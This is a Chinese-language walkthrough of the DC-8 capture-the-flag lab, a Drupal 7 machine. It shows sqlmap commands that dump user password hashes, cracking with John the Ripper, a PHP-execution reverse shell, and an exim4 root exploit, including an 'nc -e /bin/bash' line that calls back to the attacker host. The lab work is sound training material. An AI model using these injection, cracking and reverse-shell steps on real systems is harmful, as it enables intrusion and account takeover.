目錄

DC-7靶機滲透測試

1、信息收集

1.1 掃描DC-8開放端口

1.2 訪問WEB站點

2、滲透過程

2.1 用Sqlmap自動化工具注入

2.2 drush 命令對任意用戶密碼進行更改（發(fā)現(xiàn)沒有進到DC-8的shell，行不通）

2.3 John爆破用戶名和密碼

2.3 用john用戶的密碼turtle登錄后臺

3、GetShell（利用php代碼執(zhí)行漏洞）

4、提權(quán)

4.1 exim4提權(quán)

---

?

DC-8靶機滲透測試

實驗環(huán)境：

kali的IP地址：192.168.43.121
DC-8的MAC地址：00:0C:29:6F:4B:D3（192.168.43.33）

1、信息收集

1.1 掃描DC-8開放端口

得知開放了22端口和80端口、是一個Drupal 7 cms管理系統(tǒng)。

1.2 訪問WEB站點

各個選項卡點開看看，發(fā)現(xiàn)可能存在SQL注入漏洞

?

2、滲透過程

2.1 用Sqlmap自動化工具注入

sqlmap -u "http://192.168.43.33/?nid=1" --batch ? （檢測注入點）

sqlmap -u "http://192.168.43.33/?nid=1" --dbs（列出所有數(shù)據(jù)庫名字）

sqlmap -u "http://192.168.43.33/?nid=1" --current-db （列出當前數(shù)據(jù)庫的名字：'d7db'）

sqlmap -u "http://192.168.43.33/?nid=1"? -D "d7db" --tables（-D指定數(shù)據(jù)庫，--tables列出表名，發(fā)現(xiàn)users表）

sqlmap -u "http://192.168.43.33/?nid=1"? -D "d7db" -T "users" --columns（-T指定表名，--columns列出所有字段，對pass字段和name字段比較感興趣）

sqlmap -u "http://192.168.43.33/?nid=1"?-D "d7db" -T "users" -C "pass/name" --dump （-C指定列名，--dump列出字段內(nèi)容）

?

發(fā)現(xiàn)存在admin和john這兩個用戶
admin的密碼加密后為：$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john的密碼加密后為：$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

2.2 drush 命令對任意用戶密碼進行更改（發(fā)現(xiàn)沒有進到DC-8的shell，行不通）

drush是drupal shell專門管理drupal站點的shell

嘗試對admin用戶的密碼做更改！

drupal中用drush更改密碼的命令：
$ drush user:password admin "123456"
或者：$drush user-password admin --password="123456"

2.3 John爆破用戶名和密碼

著名密碼破解利器John the Ripper（使用：https://www.jianshu.com/p/5ee11fb0414e）

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
將上述密文寫到一個文件里面：vim drupal_v7_admin_hash.txt

john drupal_v7_admin_hash.txt??? 跑了好久沒有解出密碼

發(fā)現(xiàn)admin的hash并沒有解出，再將john用戶的hash放入到drupal_v7_john_hash.txt文件中,用john再默認跑一下
vim drupal_v7_john_hash.txt
得到j(luò)ohn密碼為turtle

注意vim的時候復制完密文后一定要檢查對不對

現(xiàn)在知道數(shù)據(jù)庫dbd7的john用戶的密碼為turtle

2.3 用john用戶的密碼turtle登錄后臺

查看robots.txt

?

發(fā)現(xiàn)/user/login好像是登錄后臺的界面，登錄成功

3、GetShell（利用php代碼執(zhí)行漏洞）

在john的登錄界面到處看看，終于在Contact Us界面找到了寫shell的地方

再Contact Us發(fā)現(xiàn)php代碼執(zhí)行漏洞

該漏洞在表單提交時才會觸發(fā)

這里自帶的格式不要刪除，否者會后端讀取的時候會報錯導致無法執(zhí)行php代碼！！！（否則getshell會不成功）

save之后 回到VIEW界面

提交表單（在此之前需要監(jiān)聽對應(yīng)端口）【在kali上nc -lvvp 8888】

成功getshell！

進入交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

4、提權(quán)

思路1、sudo -l（需要密碼，執(zhí)行不通X）

思路2、查看有沒有一些具有suid權(quán)限的命令

find / -perm /4000 2>dev/null

4.1 exim4提權(quán)

4.1.1 查看exim4版本

/usr/sbin/exim4 --version

發(fā)現(xiàn)版本是4.89

4.1.2 使用searchsploit查找響應(yīng)漏洞

searchsploit exim 4.

?Local Privilege Escalation（本地特權(quán)升級）

4.1.3 將響應(yīng)漏洞拷貝到靶機

scp遠程拷貝

??? 把它弄到靶機里，使用scp：
??? 需要先在kali開啟ssh服務(wù)------Kali ssh服務(wù)
$ scp root@192.168.43.121:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/? （在dc8user@dc-8:~$下拷貝）

確認已經(jīng)拷過來了

運行EXP：

有個^M，查看此exp后，看到結(jié)尾都是M，百度后的文章：
解決“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

重新執(zhí)行exp，先監(jiān)聽kali上的8888端口：
./46996.sh -m netcat
nc -e /bin/bash 192.168.43.121 8888

這里很快就會斷鏈了，所以要快點！！！：
python -c 'import pty;pty.spawn("/bin/bash")'

到/root下發(fā)現(xiàn)有flag.txt

?

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 77】DC系列之DC-8渗透测试（Drupal）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。